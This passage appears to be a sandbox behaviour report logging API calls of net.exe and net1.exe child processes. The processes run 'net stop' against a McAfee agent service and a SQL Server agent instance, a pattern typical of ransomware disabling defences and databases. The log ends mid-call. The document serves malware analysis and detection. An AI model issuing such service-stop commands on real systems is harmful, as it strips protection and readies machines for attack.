"XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0xb60 [0037.653] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15fe90 | out: lpSystemTimeAsFileTime=0x15fe90*(dwLowDateTime=0xe0a575e0, dwHighDateTime=0x1d57a86)) [0037.653] GetCurrentProcessId () returned 0xb5c [0037.653] GetCurrentThreadId () returned 0xb60 [0037.653] GetTickCount () returned 0x11446d1 [0037.653] QueryPerformanceCounter (in: lpPerformanceCount=0x15fe88 | out: lpPerformanceCount=0x15fe88*=15793744336) returned 1 [0037.653] GetModuleHandleA (lpModuleName=0x0) returned 0xd50000 [0037.653] __set_app_type (_Type=0x1) [0037.653] __p__fmode () returned 0x74eb31f4 [0037.653] __p__commode () returned 0x74eb31fc [0037.653] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd5ffe6) returned 0x0 [0037.653] __getmainargs (in: _Argc=0xd69064, _Argv=0xd6906c, _Env=0xd69068, _DoWildCard=0, _StartInfo=0xd69024 | out: _Argc=0xd69064, _Argv=0xd6906c, _Env=0xd69068) returned 0 [0037.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.654] GetConsoleOutputCP () returned 0x1b5 [0037.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd69080 | out: lpCPInfo=0xd69080) returned 1 [0037.654] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.657] sprintf_s (in: _DstBuf=0x15fe48, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0037.657] setlocale (category=0, locale=".437") returned="English_United States.437" [0037.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0037.659] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0037.659] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop macmnsvc /y" [0037.659] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x15fc14, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0037.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x2d3c00 [0037.659] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0037.659] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15fe18 | out: Buffer=0x15fe18*=0x2d1c60) returned 0x0 [0037.659] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15fe18 | out: Buffer=0x15fe18*=0x2d1c78) returned 0x0 [0037.659] _fileno (_File=0x74eb2900) returned -2 [0037.660] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0037.660] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0037.660] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0037.660] _wcsicmp (_String1="config", _String2="stop") returned -16 [0037.660] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0037.660] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0037.660] _wcsicmp (_String1="file", _String2="stop") returned -13 [0037.660] _wcsicmp (_String1="files", _String2="stop") returned -13 [0037.660] _wcsicmp (_String1="group", _String2="stop") returned -12 [0037.660] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0037.660] _wcsicmp (_String1="help", _String2="stop") returned -11 [0037.660] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0037.660] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0037.660] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0037.660] _wcsicmp (_String1="session", _String2="stop") returned -15 [0037.660] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0037.660] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0037.660] _wcsicmp (_String1="share", _String2="stop") returned -12 [0037.660] _wcsicmp (_String1="start", _String2="stop") returned -14 [0037.660] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0037.660] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0037.660] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0037.660] _wcsicmp (_String1="accounts", _String2="macmnsvc") returned -12 [0037.660] _wcsicmp (_String1="computer", _String2="macmnsvc") returned -10 [0037.660] _wcsicmp (_String1="config", _String2="macmnsvc") returned -10 [0037.660] _wcsicmp (_String1="continue", _String2="macmnsvc") returned -10 [0037.660] _wcsicmp (_String1="cont", _String2="macmnsvc") returned -10 [0037.660] _wcsicmp (_String1="file", _String2="macmnsvc") returned -7 [0037.660] _wcsicmp (_String1="files", _String2="macmnsvc") returned -7 [0037.660] _wcsicmp (_String1="group", _String2="macmnsvc") returned -6 [0037.660] _wcsicmp (_String1="groups", _String2="macmnsvc") returned -6 [0037.660] _wcsicmp (_String1="help", _String2="macmnsvc") returned -5 [0037.661] _wcsicmp (_String1="helpmsg", _String2="macmnsvc") returned -5 [0037.661] _wcsicmp (_String1="localgroup", _String2="macmnsvc") returned -1 [0037.661] _wcsicmp (_String1="pause", _String2="macmnsvc") returned 3 [0037.661] _wcsicmp (_String1="session", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="sessions", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="sess", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="share", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="start", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="stats", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="statistics", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="stop", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="time", _String2="macmnsvc") returned 7 [0037.661] _wcsicmp (_String1="user", _String2="macmnsvc") returned 8 [0037.661] _wcsicmp (_String1="users", _String2="macmnsvc") returned 8 [0037.661] _wcsicmp (_String1="msg", _String2="macmnsvc") returned 18 [0037.661] _wcsicmp (_String1="messenger", _String2="macmnsvc") returned 4 [0037.661] _wcsicmp (_String1="receiver", _String2="macmnsvc") returned 5 [0037.661] _wcsicmp (_String1="rcv", _String2="macmnsvc") returned 5 [0037.661] _wcsicmp (_String1="netpopup", _String2="macmnsvc") returned 1 [0037.661] _wcsicmp (_String1="redirector", _String2="macmnsvc") returned 5 [0037.661] _wcsicmp (_String1="redir", _String2="macmnsvc") returned 5 [0037.661] _wcsicmp (_String1="rdr", _String2="macmnsvc") returned 5 [0037.661] _wcsicmp (_String1="workstation", _String2="macmnsvc") returned 10 [0037.661] _wcsicmp (_String1="work", _String2="macmnsvc") returned 10 [0037.661] _wcsicmp (_String1="wksta", _String2="macmnsvc") returned 10 [0037.661] _wcsicmp (_String1="prdr", _String2="macmnsvc") returned 3 [0037.661] _wcsicmp (_String1="devrdr", _String2="macmnsvc") returned -9 [0037.661] _wcsicmp (_String1="lanmanworkstation", _String2="macmnsvc") returned -1 [0037.661] _wcsicmp (_String1="server", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="svr", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="srv", _String2="macmnsvc") returned 6 [0037.661] _wcsicmp (_String1="lanmanserver", _String2="macmnsvc") returned -1 [0037.662] _wcsicmp (_String1="alerter", _String2="macmnsvc") returned -12 [0037.662] _wcsicmp (_String1="netlogon", _String2="macmnsvc") returned 1 [0037.662] _wcsupr (in: _String="macmnsvc" | out: _String="MACMNSVC") returned="MACMNSVC" [0037.662] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2d54b8 [0037.664] GetServiceKeyNameW (in: hSCManager=0x2d54b8, lpDisplayName="MACMNSVC", lpServiceName=0xd6aaf0, lpcchBuffer=0x15fdb4 | out: lpServiceName="", lpcchBuffer=0x15fdb4) returned 0 [0037.665] _wcsicmp (_String1="msg", _String2="MACMNSVC") returned 18 [0037.665] _wcsicmp (_String1="messenger", _String2="MACMNSVC") returned 4 [0037.665] _wcsicmp (_String1="receiver", _String2="MACMNSVC") returned 5 [0037.665] _wcsicmp (_String1="rcv", _String2="MACMNSVC") returned 5 [0037.665] _wcsicmp (_String1="redirector", _String2="MACMNSVC") returned 5 [0037.665] _wcsicmp (_String1="redir", _String2="MACMNSVC") returned 5 [0037.665] _wcsicmp (_String1="rdr", _String2="MACMNSVC") returned 5 [0037.665] _wcsicmp (_String1="workstation", _String2="MACMNSVC") returned 10 [0037.665] _wcsicmp (_String1="work", _String2="MACMNSVC") returned 10 [0037.665] _wcsicmp (_String1="wksta", _String2="MACMNSVC") returned 10 [0037.665] _wcsicmp (_String1="prdr", _String2="MACMNSVC") returned 3 [0037.665] _wcsicmp (_String1="devrdr", _String2="MACMNSVC") returned -9 [0037.665] _wcsicmp (_String1="lanmanworkstation", _String2="MACMNSVC") returned -1 [0037.665] _wcsicmp (_String1="server", _String2="MACMNSVC") returned 6 [0037.665] _wcsicmp (_String1="svr", _String2="MACMNSVC") returned 6 [0037.665] _wcsicmp (_String1="srv", _String2="MACMNSVC") returned 6 [0037.665] _wcsicmp (_String1="lanmanserver", _String2="MACMNSVC") returned -1 [0037.665] _wcsicmp (_String1="alerter", _String2="MACMNSVC") returned -12 [0037.665] _wcsicmp (_String1="netlogon", _String2="MACMNSVC") returned 1 [0037.665] NetServiceControl (in: servername=0x0, service="MACMNSVC", opcode=0x0, arg=0x0, bufptr=0x15fdb0 | out: bufptr=0x15fdb0) returned 0x889 [0037.666] wcscpy_s (in: _Destination=0xd6a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0037.666] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0037.667] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xd6b338, nSize=0x800, Arguments=0xd69dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0037.668] GetFileType (hFile=0x26c) returned 0x3 [0037.668] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2d3fe8 [0037.668] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2d3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0037.668] WriteFile (in: hFile=0x26c, lpBuffer=0x2d3fe8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x15fcf0, lpOverlapped=0x0 | out: lpBuffer=0x2d3fe8*, lpNumberOfBytesWritten=0x15fcf0*=0x1e, lpOverlapped=0x0) returned 1 [0037.668] LocalFree (hMem=0x2d3fe8) returned 0x0 [0037.668] GetFileType (hFile=0x26c) returned 0x3 [0037.668] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0037.668] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0037.668] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15fcf0, lpOverlapped=0x0 | out: lpBuffer=0x2d6290*, lpNumberOfBytesWritten=0x15fcf0*=0x2, lpOverlapped=0x0) returned 1 [0037.668] LocalFree (hMem=0x2d6290) returned 0x0 [0037.668] _ultow (in: _Dest=0x889, _Radix=1441056 | out: _Dest=0x889) returned="2185" [0037.668] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xd6b338, nSize=0x800, Arguments=0xd69dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0037.669] GetFileType (hFile=0x26c) returned 0x3 [0037.669] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2d6290 [0037.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2d6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0037.669] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x15fcfc, lpOverlapped=0x0 | out: lpBuffer=0x2d6290*, lpNumberOfBytesWritten=0x15fcfc*=0x34, lpOverlapped=0x0) returned 1 [0037.669] LocalFree (hMem=0x2d6290) returned 0x0 [0037.669] GetFileType (hFile=0x26c) returned 0x3 [0037.669] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0037.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0037.669] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15fcfc, lpOverlapped=0x0 | out: lpBuffer=0x2d6290*, lpNumberOfBytesWritten=0x15fcfc*=0x2, lpOverlapped=0x0) returned 1 [0037.669] LocalFree (hMem=0x2d6290) returned 0x0 [0037.669] NetApiBufferFree (Buffer=0x2d1c60) returned 0x0 [0037.669] NetApiBufferFree (Buffer=0x2d1c78) returned 0x0 [0037.669] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop macmnsvc /y" [0037.669] exit (_Code=2) Process: id = "23" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49b0f000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0xb68 Process: id = "24" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x49046000" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0xb64" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0xb70 [0037.803] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb5c | out: lpSystemTimeAsFileTime=0x14fb5c*(dwLowDateTime=0xe0bd43a0, dwHighDateTime=0x1d57a86)) [0037.803] GetCurrentProcessId () returned 0xb6c [0037.803] GetCurrentThreadId () returned 0xb70 [0037.803] GetTickCount () returned 0x114476d [0037.803] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb54 | out: lpPerformanceCount=0x14fb54*=15808766899) returned 1 [0037.803] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0037.803] __set_app_type (_Type=0x1) [0037.803] __p__fmode () returned 0x74eb31f4 [0037.803] __p__commode () returned 0x74eb31fc [0037.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc4ffe6) returned 0x0 [0037.804] __getmainargs (in: _Argc=0xc59064, _Argv=0xc5906c, _Env=0xc59068, _DoWildCard=0, _StartInfo=0xc59024 | out: _Argc=0xc59064, _Argv=0xc5906c, _Env=0xc59068) returned 0 [0037.804] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.804] GetConsoleOutputCP () returned 0x1b5 [0037.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc59080 | out: lpCPInfo=0xc59080) returned 1 [0037.804] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.807] sprintf_s (in: _DstBuf=0x14fb14, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0037.807] setlocale (category=0, locale=".437") returned="English_United States.437" [0037.809] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0037.809] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0037.809] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" [0037.809] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f8e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0037.809] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x72) returned 0x57f788 [0037.809] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0037.809] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fae4 | out: Buffer=0x14fae4*=0x581c78) returned 0x0 [0037.810] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fae4 | out: Buffer=0x14fae4*=0x581c90) returned 0x0 [0037.810] _fileno (_File=0x74eb2900) returned -2 [0037.810] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0037.810] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0037.810] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0037.810] _wcsicmp (_String1="config", _String2="stop") returned -16 [0037.810] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0037.810] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0037.810] _wcsicmp (_String1="file", _String2="stop") returned -13 [0037.810] _wcsicmp (_String1="files", _String2="stop") returned -13 [0037.810] _wcsicmp (_String1="group", _String2="stop") returned -12 [0037.810] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0037.810] _wcsicmp (_String1="help", _String2="stop") returned -11 [0037.810] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0037.810] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0037.810] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0037.810] _wcsicmp (_String1="session", _String2="stop") returned -15 [0037.810] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0037.810] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0037.810] _wcsicmp (_String1="share", _String2="stop") returned -12 [0037.810] _wcsicmp (_String1="start", _String2="stop") returned -14 [0037.810] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0037.810] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0037.810] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0037.810] _wcsicmp (_String1="accounts", _String2="SQLAgent$ECWDB2") returned -18 [0037.810] _wcsicmp (_String1="computer", _String2="SQLAgent$ECWDB2") returned -16 [0037.810] _wcsicmp (_String1="config", _String2="SQLAgent$ECWDB2") returned -16 [0037.810] _wcsicmp (_String1="continue", _String2="SQLAgent$ECWDB2") returned -16 [0037.810] _wcsicmp (_String1="cont", _String2="SQLAgent$ECWDB2") returned -16 [0037.810] _wcsicmp (_String1="file", _String2="SQLAgent$ECWDB2") returned -13 [0037.810] _wcsicmp (_String1="files", _String2="SQLAgent$ECWDB2") returned -13 [0037.810] _wcsicmp (_String1="group", _String2="SQLAgent$ECWDB2") returned -12 [0037.810] _wcsicmp (_String1="groups", _String2="SQLAgent$ECWDB2") returned -12 [0037.811] _wcsicmp (_String1="help", _String2="SQLAgent$ECWDB2") returned -11 [0037.811] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$ECWDB2") returned -11 [0037.811] _wcsicmp (_String1="localgroup", _String2="SQLAgent$ECWDB2") returned -7 [0037.811] _wcsicmp (_String1="pause", _String2="SQLAgent$ECWDB2") returned -3 [0037.811] _wcsicmp (_String1="session", _String2="SQLAgent$ECWDB2") returned -12 [0037.811] _wcsicmp (_String1="sessions", _String2="SQLAgent$ECWDB2") returned -12 [0037.811] _wcsicmp (_String1="sess", _String2="SQLAgent$ECWDB2") returned -12 [0037.811] _wcsicmp (_String1="share", _String2="SQLAgent$ECWDB2") returned -9 [0037.811] _wcsicmp (_String1="start", _String2="SQLAgent$ECWDB2") returned 3 [0037.811] _wcsicmp (_String1="stats", _String2="SQLAgent$ECWDB2") returned 3 [0037.811] _wcsicmp (_String1="statistics", _String2="SQLAgent$ECWDB2") returned 3 [0037.811] _wcsicmp (_String1="stop", _String2="SQLAgent$ECWDB2") returned 3 [0037.811] _wcsicmp (_String1="time", _String2="SQLAgent$ECWDB2") returned 1 [0037.811] _wcsicmp (_String1="user", _String2="SQLAgent$ECWDB2") returned 2 [0037.811] _wcsicmp (_String1="users", _String2="SQLAgent$ECWDB2") returned 2 [0037.811] _wcsicmp (_String1="msg", _String2="SQLAgent$ECWDB2") returned -6 [0037.811] _wcsicmp (_String1="messenger", _String2="SQLAgent$ECWDB2") returned -6 [0037.811] _wcsicmp (_String1="receiver", _String2="SQLAgent$ECWDB2") returned -1 [0037.811] _wcsicmp (_String1="rcv", _String2="SQLAgent$ECWDB2") returned -1 [0037.811] _wcsicmp (_String1="netpopup", _String2="SQLAgent$ECWDB2") returned -5 [0037.811] _wcsicmp (_String1="redirector", _String2="SQLAgent$ECWDB2") returned -1 [0037.811] _wcsicmp (_String1="redir", _String2="SQLAgent$ECWDB2") returned -1 [0037.811] _wcsicmp (_String1="rdr", _String2="SQLAgent$ECWDB2") returned -1 [0037.811] _wcsicmp (_String1="workstation", _String2="SQLAgent$ECWDB2") returned 4 [0037.811] _wcsicmp (_String1="work", _String2="SQLAgent$ECWDB2") returned 4 [0037.811] _wcsicmp (_String1="wksta", _String2="SQLAgent$ECWDB2") returned 4 [0037.811] _wcsicmp (_String1="prdr", _String2="SQLAgent$ECWDB2") returned -3 [0037.811] _wcsicmp (_String1="devrdr", _String2="SQLAgent$ECWDB2") returned -15 [0037.811] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$ECWDB2") returned -7 [0037.811] _wcsicmp (_String1="server", _String2="SQLAgent$ECWDB2") returned -12 [0037.811] _wcsicmp (_String1="svr", _String2="SQLAgent$ECWDB2") returned 5 [0037.811] _wcsicmp (_String1="srv", _String2="SQLAgent$ECWDB2") returned 1 [0037.811] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$ECWDB2") returned -7 [0037.811] _wcsicmp (_String1="alerter", _String2="SQLAgent$ECWDB2") returned -18 [0037.811] _wcsicmp (_String1="netlogon", _String2="SQLAgent$ECWDB2") returned -5 [0037.812] _wcsupr (in: _String="SQLAgent$ECWDB2" | out: _String="SQLAGENT$ECWDB2") returned="SQLAGENT$ECWDB2" [0037.812] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x585460 [0037.814] GetServiceKeyNameW (in: hSCManager=0x585460, lpDisplayName="SQLAGENT$ECWDB2", lpServiceName=0xc5aaf0, lpcchBuffer=0x14fa80 | out: lpServiceName="", lpcchBuffer=0x14fa80) returned 0 [0037.815] _wcsicmp (_String1="msg", _String2="SQLAGENT$ECWDB2") returned -6 [0037.815] _wcsicmp (_String1="messenger", _String2="SQLAGENT$ECWDB2") returned -6 [0037.815] _wcsicmp (_String1="receiver", _String2="SQLAGENT$ECWDB2") returned -1 [0037.815] _wcsicmp (_String1="rcv", _String2="SQLAGENT$ECWDB2") returned -1 [0037.815] _wcsicmp (_String1="redirector", _String2="SQLAGENT$ECWDB2") returned -1 [0037.815] _wcsicmp (_String1="redir", _String2="SQLAGENT$ECWDB2") returned -1 [0037.815] _wcsicmp (_String1="rdr", _String2="SQLAGENT$ECWDB2") returned -1 [0037.815] _wcsicmp (_String1="workstation", _String2="SQLAGENT$ECWDB2") returned 4 [0037.815] _wcsicmp (_String1="work", _String2="SQLAGENT$ECWDB2") returned 4 [0037.815] _wcsicmp (_String1="wksta", _String2="SQLAGENT$ECWDB2") returned 4 [0037.815] _wcsicmp (_String1="prdr", _String2="SQLAGENT$ECWDB2") returned -3 [0037.815] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$ECWDB2") returned -15 [0037.815] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$ECWDB2") returned -7 [0037.815] _wcsicmp (_String1="server", _String2="SQLAGENT$ECWDB2") returned -12 [0037.815] _wcsicmp (_String1="svr", _String2="SQLAGENT$ECWDB2") returned 5 [0037.815] _wcsicmp (_String1="srv", _String2="SQLAGENT$ECWDB2") returned 1 [0037.815] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$ECWDB2") returned -7 [0037.815] _wcsicmp (_String1="alerter", _String2="SQLAGENT$ECWDB2") returned -18 [0037.815] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$ECWDB2") returned -5 [0037.815] NetServiceControl (in: servername=0x0, service="SQLAGENT$ECWDB2", opcode=0x0, arg=0x0, bufptr=0x14fa7c | out: bufptr=0x14fa7c) returned 0x889 [0037.816] wcscpy_s (in: _Destination=0xc5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0037.816] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0037.817] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc5b338, nSize=0x800, Arguments=0xc59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0037.818] GetFileType (hFile=0x26c) returned 0x3 [0037.818] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x583f90 [0037.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x583f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0037.818] WriteFile (in: hFile=0x26c, lpBuffer=0x583f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14f9bc, lpOverlapped=0x0 | out: lpBuffer=0x583f90*, lpNumberOfBytesWritten=0x14f9bc*=0x1e, lpOverlapped=0x0) returned 1 [0037.818] LocalFree (hMem=0x583f90) returned 0x0 [0037.818] GetFileType (hFile=0x26c) returned 0x3 [0037.818] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586238 [0037.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0037.819] WriteFile (in: hFile=0x26c, lpBuffer=0x586238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f9bc, lpOverlapped=0x0 | out: lpBuffer=0x586238*, lpNumberOfBytesWritten=0x14f9bc*=0x2, lpOverlapped=0x0) returned 1 [0037.819] LocalFree (hMem=0x586238) returned 0x0 [0037.819] _ultow (in: _Dest=0x889, _Radix=1374700 | out: _Dest=0x889) returned="2185" [0037.819] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc5b338, nSize=0x800, Arguments=0xc59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0037.819] GetFileType (hFile=0x26c) returned 0x3 [0037.819] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x586238 [0037.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x586238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET 